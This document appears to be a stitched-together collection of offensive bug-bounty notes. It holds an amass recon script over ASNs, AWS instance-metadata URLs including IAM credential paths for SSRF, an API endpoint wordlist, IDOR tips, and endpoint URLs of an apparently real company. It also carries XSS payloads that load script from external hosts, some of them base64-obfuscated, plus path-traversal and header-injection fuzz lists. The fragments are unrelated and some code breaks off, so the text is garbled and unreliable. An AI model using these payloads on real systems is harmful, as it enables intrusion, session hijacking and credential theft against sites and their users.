#!/bin/bash
asnlist=(59055 59054 59053 5905 259051 59028 45104 45103 45102 45096 37963 34947 134963)
for i in ${asnlist[@]} ; do
amass intel -active -asn $i -p 80,4443,2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,744
echo "searching $i"
done
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
import requests, json
from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
requests.packages.urllib3.disable_warnings(SNIMissingWarning)
# another source of cidrs by asn
def getIPCidrs(asn):
/2
/graphql-proxy/admin
/3.0/
/3ds_callback
/3ds_update_payment_callback
/accounts
/active
/activity
/actuator
/actuator/auditevents
* If the wordlist can't find anything on the API, use hakrawler
* Every domain could have an API. Add a JSON extension to endpoints and see the response
* If IDs are not numerical, try to find leaked IDs from other places (e.g. posts the user created, and other features)
* Some endpoints will return you a UUID as a response to an e-mail address etc.
* If there is no leak of the user ID, just swap with the user ID of another account you created
* Look for permissions in every endpoint
* Change lowercase to uppercase or vice versa in endpoints
* After finding endpoints, Arjun it
* Use all HTTP request methods
* Look for IDORs in HTTP headers and body
Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3650.0
http://apps.bentley.com:80/claimsviewerims
http://apps.bentley.com:80/claimsviewerims/default.aspx
http://apps.bentley.com:80/srmanager
http://apps.bentley.com:80/srmanager/AccountSRs
http://apps.bentley.com:80/srmanager/AccountSRs/SRList
http://apps.bentley.com:80/srmanager/Billing
http://apps.bentley.com:80/srmanager/Billing/ProblemArea
http://apps.bentley.com:80/srmanager/Billing/ProblemAreaContact
<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline JS but allows S3 buckets. The "<script>" tag doesn't work but there is HTML injection!!
<svg/onload=alert(1)> //this is everywhere
<img src=x onerror=alert(document.domain)> //this is also everywhere
"><script src=https://ubey.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') //For use where URIs are taken as input.
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags
/
/*
/*.*
/*?
/*?*
/.../.../.../
/./
//
///
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
X-Forwarded-Host:
Host:
Referer:
X-Forwarded-For:
/
!
!=
&&
*
*&
*.*
*?
*?*
.../.../.../